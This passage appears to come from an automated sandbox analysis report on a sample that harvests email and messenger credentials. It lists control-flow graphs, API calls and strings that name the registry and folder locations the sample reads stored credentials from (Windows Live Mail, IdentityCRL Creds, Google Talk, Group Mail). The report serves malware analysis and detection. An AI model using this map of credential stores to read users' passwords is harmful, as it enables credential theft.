261->265 265->264
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                    • String ID: k:v
                                    • API String ID: 3662548030-4078055367
                                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                    • memcpy.MSVCRT ref: 0040FBE4
                                    • memcpy.MSVCRT ref: 0040FBF9
                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                    • API String ID: 2768085393-2409096184
                                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 0044430B
                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                    • memset.MSVCRT ref: 00444379
                                    • memset.MSVCRT ref: 00444394
                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                    • strlen.MSVCRT ref: 004443DB
                                    • _strcmpi.MSVCRT ref: 00444401
                                    Strings
                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                    • Store Root, xrefs: 004443A5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                    • API String ID: 832325562-2578778931
                                    • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                    • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                    APIs
                                    • memset.MSVCRT ref: 0040F567
                                    • memset.MSVCRT ref: 0040F57F
                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                    • memcpy.MSVCRT ref: 0040F652
                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                    • String ID:
                                    • API String ID: 2012582556-3916222277
                                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                    APIs
                                    • memset.MSVCRT ref: 004037EB
                                    • memset.MSVCRT ref: 004037FF
                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                    • strchr.MSVCRT ref: 0040386E
                                    • _mbscpy.MSVCRT ref: 0040388B
                                    • strlen.MSVCRT ref: 00403897
                                    • sprintf.MSVCRT ref: 004038B7
                                    • _mbscpy.MSVCRT ref: 004038CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                    • String ID: %s@yahoo.com
                                    • API String ID: 317221925-3288273942
                                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                    APIs
                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadMessageProc
                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                    • API String ID: 2780580303-317687271
                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                    APIs
                                    • memset.MSVCRT ref: 00403504
                                    • memset.MSVCRT ref: 0040351A
                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                    • _mbscpy.MSVCRT ref: 00403555
                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                    • _mbscat.MSVCRT ref: 0040356D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                    • API String ID: 3071782539-966475738
                                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 380 40cd31-40cd57 378->380 379->380 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 380->382 383 40cd59-40cd60 DeleteObject 380->383 383->382
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                    • String ID:
                                    • API String ID: 2054149589-0
                                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                    • memset.MSVCRT ref: 00408620
                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                    • memset.MSVCRT ref: 00408671
                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                    Strings
                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                    • String ID: Software\Google\Google Talk\Accounts
                                    • API String ID: 1366857005-1079885057
                                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Cursor_mbsicmpqsort
                                    • String ID: /nosort$/sort
                                    • API String ID: 882979914-1578091866
                                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                    APIs
                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                    • memset.MSVCRT ref: 00410E10
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                    • _mbscpy.MSVCRT ref: 00410E87
                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                    • API String ID: 889583718-2036018995
                                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                    APIs
                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID:
                                    • API String ID: 3473537107-0
                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                    APIs
                                    • memset.MSVCRT ref: 004109F7
                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                      • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                    • memset.MSVCRT ref: 00410A32
                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                    • String ID:
                                    • API String ID: 3143880245-0
                                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@
                                    • String ID:
                                    • API String ID: 1033339047-0
                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@mallocmemcpy
                                    • String ID:
                                    • API String ID: 3831604043-0
                                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                    APIs
                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CreateFontIndirect_mbscpymemset
                                    • String ID: Arial
                                    • API String ID: 3853255127-493054409
                                    • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                    • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                    APIs
                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: strlen$_strcmpimemset
                                    • String ID: /stext
                                    • API String ID: 520177685-3817206916
                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
